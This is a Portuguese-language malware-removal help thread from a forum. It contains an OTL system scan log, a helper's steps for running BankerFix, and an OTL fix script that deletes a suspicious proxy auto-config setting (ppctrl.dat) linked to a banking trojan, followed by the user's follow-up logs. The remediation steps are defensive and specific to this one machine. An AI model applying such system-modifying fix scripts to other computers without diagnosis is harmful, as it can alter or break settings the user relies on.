DRV - [2012/09/15 16:59:31 | 000,242,240 | ---- | M] (DT Soft Ltd) [Kernel | System | Running] -- C:\Windows\System32\drivers\dtsoftbus01.sys -- (dtsoftbus01)

DRV - [2012/08/23 12:44:32 | 000,014,848 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\rdpvideominiport.sys -- (RdpVideoMiniport)

DRV - [2012/08/23 12:40:25 | 000,049,664 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\TsUsbFlt.sys -- (TsUsbFlt)

DRV - [2010/11/20 10:30:15 | 000,175,360 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\vmbus.sys -- (vmbus)

DRV - [2010/11/20 10:30:15 | 000,040,704 | ---- | M] (Microsoft Corporation) [Kernel | Boot | Running] -- C:\Windows\System32\drivers\vmstorfl.sys -- (storflt)

DRV - [2010/11/20 10:30:15 | 000,028,032 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\storvsc.sys -- (storvsc)

DRV - [2010/11/20 07:59:44 | 000,035,968 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\winusb.sys -- (WinUsb)

DRV - [2010/11/20 07:14:45 | 000,017,920 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\VMBusHID.sys -- (VMBusHID)

DRV - [2010/11/20 07:14:41 | 000,005,632 | ---- | M] (Microsoft Corporation) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\vms3cap.sys -- (s3cap)

DRV - [2009/07/13 20:09:17 | 004,194,816 | ---- | M] (ATI Technologies Inc.) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\atikmdag.sys -- (atikmdag)

DRV - [2009/07/13 20:02:50 | 000,211,456 | ---- | M] (Intel Corporation) [Kernel | On_Demand | Running] -- C:\Windows\System32\drivers\e1e6032.sys -- (e1express)

DRV - [2005/02/11 11:19:20 | 000,055,216 | ---- | M] (MCCI) [Kernel | On_Demand | Stopped] -- C:\Windows\System32\drivers\k750bus.sys -- (k750bus)

========== Standard Registry (SafeList) ==========

========== Internet Explorer ==========

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,CustomizeSearch = http://www.google.com

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com

IE - HKLM\..\SearchScopes,DefaultScope =

IE - HKLM\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = http://br.msn.com/?ocid=iehp

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = pt-br

IE - HKCU\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 93 66 3B FF A9 7E CC 01 [binary data]

IE - HKCU\..\SearchScopes,DefaultScope = {DB9BCD20-54F3-4A60-9865-B07BC3E63560}

IE - HKCU\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7

IE - HKCU\..\SearchScopes\{DB9BCD20-54F3-4A60-9865-B07BC3E63560}: "URL" = http://www.google.com/search?hl=en&q={searchTerms}&rlz=1I7GGNI_pt-BRBR507

IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "AutoConfigURL" = file://C:\ProgramData\ppctrl.dat

========== FireFox ==========

FF - prefs.js..browser.search.selectedEngine: "Google"

FF - prefs.js..browser.search.useDBForOrder: true

FF - prefs.js..network.proxy.autoconfig_url: ""

FF - prefs.js..network.proxy.http: ""

FF - prefs.js..network.proxy.type: 2

FF - user.js - File not found

FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF32_11_9_900_117.dll ()

FF - HKLM\Software\MozillaPlugins\@foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/pdf: C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll (Foxit Corporation)

FF - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.45.2: C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)

FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.45.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/OfficeAuthz,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/SharePoint,version=14.0: C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)

FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)

FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Users\2011\AppData\Local\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)

FF - HKCU\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Users\2011\AppData\Local\Google\Update\1.3.22.3\npGoogleUpdate3.dll (Google Inc.)

FF - HKEY_LOCAL_MACHINE\software\mozilla\Firefox\Extensions\\daplinkchecker@speedbit.com: C:\Program Files\DAP\daplinkchecker [2013/02/10 01:00:56 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013/10/05 22:41:29 | 000,000,000 | ---D | M]

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins

FF - HKEY_CURRENT_USER\software\mozilla\Firefox\Extensions\\{F17C1572-C9EC-4e5c-A542-D05CBB5C5A08}: C:\Program Files\DAP\DAPFireFox [2013/02/10 01:00:55 | 000,000,000 | ---D | M]

FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Components: C:\Program Files\Mozilla Firefox\components [2013/10/05 22:41:29 | 000,000,000 | ---D | M]

FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 20.0.1\extensions\\Plugins: C:\Program Files\Mozilla Firefox\plugins

[2012/10/05 20:47:52 | 000,000,000 | ---D | M] (No name found) -- C:\Users\2011\AppData\Roaming\mozilla\Extensions

[2013/11/23 15:59:57 | 000,000,000 | ---D | M] (No name found) -- C:\Users\2011\AppData\Roaming\mozilla\Firefox\Profiles\1t2pwtzw.default\extensions

[2013/10/06 10:06:43 | 000,000,000 | ---D | M] (DownloadHelper) -- C:\Users\2011\AppData\Roaming\mozilla\Firefox\Profiles\1t2pwtzw.default\extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}

[2013/11/23 15:59:57 | 000,382,345 | ---- | M] () (No name found) -- C:\Users\2011\AppData\Roaming\mozilla\firefox\profiles\1t2pwtzw.default\extensions\{19503e42-ca3c-4c27-b1e2-9cdb2170ee34}.xpi

[2013/10/05 22:41:09 | 000,000,000 | ---D | M] (No name found) -- C:\Arquivos de Programas\Mozilla Firefox\extensions

[2013/10/05 22:41:28 | 000,263,064 | ---- | M] (Mozilla Foundation) -- C:\Program Files\mozilla firefox\components\browsercomps.dll

[2013/10/05 22:41:22 | 000,001,240 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\buscape.xml

[2013/10/05 22:41:22 | 000,001,425 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\mercadolivre.xml

[2013/10/05 22:41:22 | 000,002,086 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\twitter.xml

[2013/10/05 22:41:22 | 000,001,381 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\wikipedia-br.xml

[2013/10/05 22:41:22 | 000,001,165 | ---- | M] () -- C:\Program Files\mozilla firefox\searchplugins\yahoo-br.xml

========== Chrome ==========

CHR - default_search_provider: Google (Enabled)

CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:bookmarkBarPinned}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}{google:omniboxStartMarginParameter}ie={inputEncoding}

CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client={google:suggestClient}&q={searchTerms}&{google:cursorPosition}{google:zeroPrefixUrl}{google:pageClassification}sugkey={google:suggestAPIKeyParameter},

CHR - homepage: http://www.google.com

CHR - plugin: Widevine Content Decryption Module (Enabled) = C:\Users\2011\AppData\Local\Google\Chrome\User Data\WidevineCDM\1.4.1.376\_platform_specific\win_x86\widevinecdmadapter.dll

CHR - plugin: Shockwave Flash (Enabled) = C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.57\PepperFlash\pepflashplayer.dll

CHR - plugin: Chrome Remote Desktop Viewer (Disabled) = internal-remoting-viewer

CHR - plugin: Native Client (Enabled) = C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.57\ppGoogleNaClPluginChrome.dll

CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Users\2011\AppData\Local\Google\Chrome\Application\31.0.1650.57\pdf.dll

CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL

CHR - plugin: Microsoft Office 2010 (Enabled) = C:\PROGRA~1\MICROS~2\Office14\NPSPWRAP.DLL

CHR - plugin: Foxit Reader Plugin for Mozilla (Disabled) = C:\Program Files\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll

CHR - plugin: Java Deployment Toolkit 7.0.450.18 (Enabled) = C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll

CHR - plugin: Java Platform SE 7 U45 (Enabled) = C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll

CHR - plugin: Google Update (Enabled) = C:\Users\2011\AppData\Local\Google\Update\1.3.21.165\npGoogleUpdate3.dll

CHR - plugin: Shockwave Flash (Enabled) = C:\Windows\system32\Macromed\Flash\NPSWF32_11_9_900_117.dll

CHR - Extension: YouTube Center = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\bcegdpionpopahcglnfiiioapcclamdj\2.0.1_0\

CHR - Extension: James White = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\bkeidgmehkdjmpjodpjkepolokanalkm\3_0\

CHR - Extension: DAP Link Checker = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\bodfdknjhecmadheclfjkhhiofeagdbh\1.0.1.8_0\

CHR - Extension: Download Accelerator Plus (DAP) = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\ffdcfjdljhbehggjdkdioajnknjcpbjb\2.0.11_0\

CHR - Extension: Windows Media Player Extension for HTML5 = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\hokdglbhghcebcopdbanieangmcamaak\1.0_0\

CHR - Extension: Google Wallet = C:\Users\2011\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\0.0.5.0_0\

O1 HOSTS File: ([2009/06/10 19:39:37 | 000,000,824 | ---- | M]) - C:\Windows\System32\drivers\etc\hosts

O2 - BHO: (Groove GFS Browser Helper) - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\Arquivos de Programas\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)

O2 - BHO: (Java Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Arquivos de Programas\Java\jre7\bin\ssv.dll (Oracle Corporation)

O2 - BHO: (Office Document Cache Handler) - {B4F3A835-0E21-4959-BA22-42B3008E02FF} - C:\Arquivos de Programas\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)

O2 - BHO: (SpeedBit Link Verification Helper) - {D5974A72-C81C-4DC3-BE77-A8A7BBC8864E} - C:\Arquivos de Programas\DAP\LinkVerifier.dll (Speedbit Ltd.)

O2 - BHO: (Java Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Arquivos de Programas\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)

O4 - HKLM..\Run: [20131121] C:\Program Files\AVAST Software\Avast\setup\emupdate\2b520615-d68a-4492-a5e4-39b59408a272.exe (AVAST Software)

O4 - HKLM..\Run: [AvastUI.exe] C:\Program Files\AVAST Software\Avast\AvastUI.exe (AVAST Software)

O4 - HKCU..\Run: [F.lux] C:\Users\2011\Local Settings\Apps\F.lux\flux.exe ()

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3

O7 - HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O8 - Extra context menu item: &Download with &DAP - C:\Arquivos de Programas\DAP\dapextie.htm ()

O8 - Extra context menu item: &Verify with DAP - C:\Arquivos de Programas\DAP\dapverify.htm ()

O8 - Extra context menu item: Download &all with DAP - C:\Arquivos de Programas\DAP\dapextie2.htm ()

O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office10\EXCEL.EXE/3000 File not found

O8 - Extra context menu item: E&xportar para o Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000 File not found

O8 - Extra context menu item: Sothink Flash Downloader For IE - C:\Arquivos de Programas\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm ()

O9 - Extra Button: Sothink Flash Downloader For IE - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Arquivos de Programas\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm ()

O9 - Extra 'Tools' menuitem : Sothink Flash Downloader For IE - {E19ADC6E-3909-43E4-9A89-B7B676377EE3} - C:\Arquivos de Programas\Common Files\SourceTec\SWF Catcher\InternetExplorer.htm ()

O13 - gopher Prefix: missing

O16 - DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} http://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab (Java Plug-in 10.45.2)

O16 - DPF: {CAFEEFAC-0016-0000-0030-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab (Java Plug-in 1.6.0_30)

O16 - DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} http://java.sun.com/update/1.6.0/jinstall-1_6_0_30-windows-i586.cab (Java Plug-in 10.45.2)

O16 - DPF: {D27CDB6E-AE6D-11CF-96B8-444553540000} http://fpdownload2.macromedia.com/get/shockwave/cabs/flash/swflash.cab (Shockwave Flash Object)

O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 186.194.224.2 189.51.144.3 8.8.8.8 8.8.4.4

O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{A2789148-CF95-4F73-990F-5895C4E94439}: DhcpNameServer = 186.194.224.2 189.51.144.3 8.8.8.8 8.8.4.4

O18 - Protocol\Handler\msdaipp\0x00000001 {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Arquivos de Programas\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)

O18 - Protocol\Handler\msdaipp\oledb {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Arquivos de Programas\Common Files\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)

O18 - Protocol\Handler\ms-help {314111c7-a502-11d2-bbca-00c04f8ec294} - C:\Arquivos de Programas\Common Files\microsoft shared\Help\hxds.dll (Microsoft Corporation)

O18 - Protocol\Handler\skype4com {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Arquivos de Programas\Common Files\Skype\Skype4COM.dll (Skype Technologies)

O18 - Protocol\Filter\text/xml {807573E5-5146-11D5-A672-00B0D022E945} - C:\Arquivos de Programas\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL (Microsoft Corporation)

O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)

O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\System32\userinit.exe (Microsoft Corporation)

O20 - HKLM Winlogon: VMApplet - (SystemPropertiesPerformance.exe) - C:\Windows\System32\SystemPropertiesPerformance.exe (Microsoft Corporation)

O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.

O28 - HKLM ShellExecuteHooks: {B5A7F190-DDA6-4420-B3BA-52453494E6CD} - C:\Arquivos de Programas\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)

O32 - HKLM CDRom: AutoRun - 1

O32 - AutoRun File - [2009/06/10 19:42:20 | 000,000,024 | ---- | M] () - C:\autoexec.bat -- [ NTFS ]

O34 - HKLM BootExecute: (autocheck autochk *)

O35 - HKLM\..comfile [open] -- "%1" %*

O35 - HKLM\..exefile [open] -- "%1" %*

O37 - HKLM\...com [@ = comfile] -- "%1" %*

O37 - HKLM\...exe [@ = exefile] -- "%1" %*

O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)

O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)

O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

========== Files/Folders - Created Within 30 Days ==========

[2013/12/04 20:43:51 | 000,000,000 | ---D | C] -- C:\_OTL

[2013/11/30 11:23:22 | 000,602,112 | ---- | C] (OldTimer Tools) -- C:\Users\2011\Desktop\OTL.exe

[2013/11/23 11:05:22 | 000,000,000 | ---D | C] -- C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Winamp

[2013/11/17 13:08:42 | 000,000,000 | ---D | C] -- C:\AdwCleaner

[2013/11/17 11:13:19 | 000,000,000 | ---D | C] -- C:\Users\2011\Desktop\gmer

[2013/11/08 22:37:09 | 000,403,440 | ---- | C] (AVAST Software) -- C:\Windows\System32\drivers\aswsp.sys

[1 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]

[1 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]

========== Files - Modified Within 30 Days ==========

[2013/12/04 20:46:40 | 000,001,048 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job

[2013/12/04 20:46:20 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat

[2013/12/04 20:46:15 | 1608,970,240 | -HS- | M] () -- C:\hiberfil.sys

[2013/12/04 20:05:47 | 000,001,052 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job

[2013/12/04 19:55:29 | 000,001,074 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-1065731957-2128596916-2441434026-1000UA.job

[2013/12/03 22:55:00 | 000,001,022 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskUserS-1-5-21-1065731957-2128596916-2441434026-1000Core.job

[2013/12/01 16:34:29 | 000,017,744 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0

[2013/12/01 16:34:29 | 000,017,744 | -H-- | M] () -- C:\Windows\System32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0

[2013/11/30 13:50:57 | 000,139,264 | ---- | M] () -- C:\Users\2011\Desktop\SystemLook.exe

[2013/11/30 11:23:26 | 000,602,112 | ---- | M] (OldTimer Tools) -- C:\Users\2011\Desktop\OTL.exe

[2013/11/22 22:38:34 | 000,663,606 | ---- | M] () -- C:\Windows\System32\prfh0416.dat

[2013/11/22 22:38:34 | 000,615,810 | ---- | M] () -- C:\Windows\System32\perfh009.dat

[2013/11/22 22:38:34 | 000,127,896 | ---- | M] () -- C:\Windows\System32\prfc0416.dat

[2013/11/22 22:38:34 | 000,106,190 | ---- | M] () -- C:\Windows\System32\perfc009.dat

[2013/11/08 22:37:09 | 000,403,440 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswsp.sys

[2013/11/08 22:36:37 | 000,057,672 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswTdi.sys

[2013/11/08 22:36:36 | 000,774,392 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswSnx.sys

[2013/11/08 22:36:36 | 000,070,384 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswMonFlt.sys

[2013/11/08 22:36:36 | 000,035,656 | ---- | M] (AVAST Software) -- C:\Windows\System32\drivers\aswFsBlk.sys

[2013/11/08 22:36:35 | 000,269,216 | ---- | M] (AVAST Software) -- C:\Windows\System32\aswBoot.exe

[2013/11/08 22:36:35 | 000,043,152 | ---- | M] (AVAST Software) -- C:\Windows\avastSS.scr

[2013/11/07 12:39:27 | 000,000,902 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job

[1 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]

[1 C:\ProgramData\*.tmp files -> C:\ProgramData\*.tmp -> ]

========== Files Created - No Company Name ==========

[2013/11/30 13:50:46 | 000,139,264 | ---- | C] () -- C:\Users\2011\Desktop\SystemLook.exe

[2013/03/03 22:17:49 | 000,178,304 | ---- | C] () -- C:\Windows\System32\drivers\aswVmm.sys

[2013/03/03 22:17:48 | 000,049,944 | ---- | C] () -- C:\Windows\System32\drivers\aswRvrt.sys

[2013/02/10 01:00:51 | 000,109,256 | ---- | C] () -- C:\Windows\System32\EasyHook64.dll

[2013/02/10 01:00:51 | 000,090,824 | ---- | C] () -- C:\Windows\System32\EasyHook32.dll

[2013/01/07 19:58:22 | 000,000,871 | ---- | C] () -- C:\Windows\QIII.INI

[2012/10/12 22:39:15 | 000,004,096 | -H-- | C] () -- C:\Users\2011\AppData\Local\keyfile3.drm

[2012/09/09 20:09:22 | 000,000,766 | ---- | C] () -- C:\Windows\ODBC.INI

[2012/08/25 15:28:41 | 000,026,624 | ---- | C] () -- C:\Windows\System32\ssb6mlm.dll

[2012/08/13 00:42:51 | 000,007,607 | ---- | C] () -- C:\Users\2011\AppData\Local\Resmon.ResmonCfg

[2012/08/12 21:56:40 | 000,178,688 | ---- | C] () -- C:\Windows\System32\unrar.dll

[2012/08/07 23:04:07 | 000,077,824 | ---- | C] () -- C:\Windows\KMService.exe

[2012/08/07 23:04:07 | 000,008,192 | ---- | C] () -- C:\Windows\System32\srvany.exe

[2012/08/07 22:52:48 | 000,080,896 | ---- | C] () -- C:\Windows\System32\RDVGHelper.exe

[2012/08/07 22:50:48 | 000,066,048 | ---- | C] () -- C:\Windows\System32\PrintBrmUi.exe

========== ZeroAccess Check ==========

[2009/07/14 02:42:31 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini

[HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

[HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32]

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32]

"" = %SystemRoot%\system32\shell32.dll -- [2013/07/25 23:55:59 | 012,872,704 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Apartment

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32]

"" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 10:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Free

[HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32]

"" = %systemroot%\system32\wbem\wbemess.dll -- [2009/07/13 23:16:17 | 000,342,528 | ---- | M] (Microsoft Corporation)

"ThreadingModel" = Both

========== LOP Check ==========

[2013/10/21 22:33:44 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\AVAST Software

[2012/08/12 21:47:52 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\BSplayer

[2012/09/09 16:52:57 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\BSplayer Pro

[2012/12/22 13:00:05 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\Canneverbe Limited

[2013/06/07 19:30:38 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\DAEMON Tools Lite

[2013/05/25 20:21:10 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\EQATEC Analytics

[2012/12/19 19:47:24 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\Foxit Software

[2013/06/27 20:35:06 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\PotPlayerMini

[2013/10/13 16:20:40 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\uTorrent

[2012/09/01 22:54:53 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\Youtube Downloader HD

[2012/09/01 22:28:57 | 000,000,000 | ---D | M] -- C:\Users\2011\AppData\Roaming\Youtube to MP3 Converter

========== Purity Check ==========

< End of report >

Compartilhar este post


Link para o post
Compartilhar em outros sites

Caro manoelvalerio

# Etapa nº 1 #

Faça o download do BankerFix e salve em seu desktop.

  • Importante:A ferramenta irá finalizar o Internet Explorer. Salve qualquer link que precisar antes de executá-la.
  • Clique duas vezes no ícone instalador do BankerFix.
  • Na janela que abrir clique em Executar. Depois clique em Sim.
  • Abrirá uma janela de aviso, certifique que seu computador esteja conectado a Internet. Clique em Ok
  • Vai perceber uma "movimentação" na barra de tarefas... Na janela que abrir em Ok para executar a ferramenta.
  • Abrirá um prompt. Pressione qualquer tecla para continuar.
  • Aguarde...
  • Novamente, pressione qualquer tecla para continuar.
  • Quando terminar, cole o conteúdo do arquivo C:\LinhaDefensiva\relatorio.txt em sua próxima resposta.

Depois de fazer sua resposta você pode apagar a pasta: C:\LinhaDefensiva

# Etapa nº 2 #

Novamente com o OTL

  • Clique duas vezes no ícone 3984478580_7ed4cabc45_o.gif
  • Copie e cole o conteúdo abaixo, no espaço logo após 5369460409_ee749edc8e_m.jpg

:OTL
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Int ernet Settings: "AutoConfigURL" = file://C:\ProgramData\ppctrl.dat

:Commands
[reboot]

  • Clique no botão 5370056394_358505935a_m.jpg
  • Quando reiniciar vai aparecer uma janela, clique em executar;
  • Salve (arquivo > salvar como) o log no desktop com um nome que desejar;
  • Poste o conteúdo desse log em sua próxima resposta.
  • Atenção: se fechar o log sem ter salvo antes ele sumirá.
  • Abra novamente o OTL e clique no botão 5370056476_bf9f840a51_m.jpg
  • Não interrompa o scan em hipótese algum;
  • Quando terminar será gerado o OTL.txt;
  • Poste mais este log em sua próxima resposta o log gerado.

Observação: Se por acaso perder o log depois do reinício do computador você poderá acessá-lo na pasta C:\_OTL\Moved Files

Abraços :D

Compartilhar este post


Link para o post
Compartilhar em outros sites

Boa tarde Diego.

Este código para o OTL o fez travar, não concluiu o comando e nem reiniciou o PC.

Segue o log do Bankerfix.

Grato!

Manoel.

-------------------------------------------------------

BankerFix 3.5 VALKYRIE - Removedor de Bankers

Linha Defensiva | http://www.linhadefensiva.org

http://www.linhadefensiva.org/bankerfix/

-------------------------------------------------------

Data: 2013-12-05 - 18:18

-------------------------------------------------------

Lista de Definição: 2012-08-22-1 | CORE: 2012-08-22-6

=======================================================

Arquivo infectado detectado: C:\Install.exe

Arquivo infectado removido com sucesso!

----- Fim -------------------------

Compartilhar este post


Link para o post
Compartilhar em outros sites

Caro manoelvalerio

Tente com agora com este:

:OTL
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "AutoConfigURL" = file://C:\ProgramData\ppctrl.dat

:Commands
[reboot]

Abraços :D

Compartilhar este post


Link para o post
Compartilhar em outros sites

Boa tarde Diego.

Inseri o novo código no OTL, e o computador reiniciou normalmente.

O Avast não está mais notificando da ameaça do JS: Banker. Será que já está tudo limpo?

Segue o log do OTL.

Agradeço seu empenho. Abraço!

OTL logfile created on: 08/12/2013 12:25:48 - Run 3

OTL by OldTimer - Version 3.2.69.0 Folder = C:\Users\2011\Desktop

Ultimate Edition Service Pack 1 (Version = 6.1.7601) - Type = NTWorkstation

Internet Explorer (Version = 9.11.9600.16428)

Locale: 00000416 | Country: Brasil | Language: PTB | Date Format: dd/MM/yyyy

